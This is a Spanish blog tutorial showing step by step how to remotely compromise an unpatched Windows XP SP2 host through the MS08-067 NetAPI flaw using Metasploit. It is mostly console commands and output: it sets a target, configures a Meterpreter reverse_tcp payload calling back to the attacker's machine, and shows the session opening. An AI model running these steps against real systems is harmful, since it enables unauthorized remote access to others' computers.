metasploit, acceso remoto a windows

Tener acceso a un Windows sin actualizar es algo muy sencillo. En este caso y para aquellos que lo quieran probar, se accederá remotamente a un Windows XP SP2 aprovechando un bug ampliamente conocido y simple de explotar, como no, desde metasploit. Concretamente vamos a aprovecharnos de la vulnerabilidad CVE-2008-4250, que se aprovecha de un fallo en el análisis de la ruta en la librería NetAPI32.dll y permite el acceso. Como siempre, desde metasploit, muy sencillo.

Partiendo de una red como la pintada en el esquema, simplemente,
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Setting  Required  Description
----     -------  --------  -----------
RHOST             yes       The target address
RPORT    445      yes       Set the SMB service port
SMBPIPE  BROWSER  yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf  exploit(ms08_067_netapi)> set RHOST 192.168.1.42
RHOST => 192.168.1.42
Como interesa tener acceso al equipo y poder establecer una conexión con él para poder "hacer cosas" y observar que sí es vulnerable, habrá que cargar un PAYLOAD que usar y configurarlo.
msf  exploit(ms08_067_netapi)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi)> show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name     Setting       Required  Description
----     -------       --------  -----------
RHOST    192.168.1.42  yes       The target address
RPORT    445           yes       Set the SMB service port
SMBPIPE  BROWSER       yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

Name      Setting  Required  Description
----      -------  --------  -----------
EXITFUNC  thread   yes       Exit technique: seh, thread, process, none
LHOST              yes       The listen address
LPORT     4444     yes       The listen port


Exploit target:

Id  Name
--  ----
0   Automatic Targeting

msf  exploit(ms08_067_netapi)> set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf  exploit(ms08_067_netapi)> exploit

[*] Started reverse handler on 192.168.1.33:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.42
[*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.42:2940) at 2012-02-07 19:47:33 +0100

meterpreter> p0wned


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios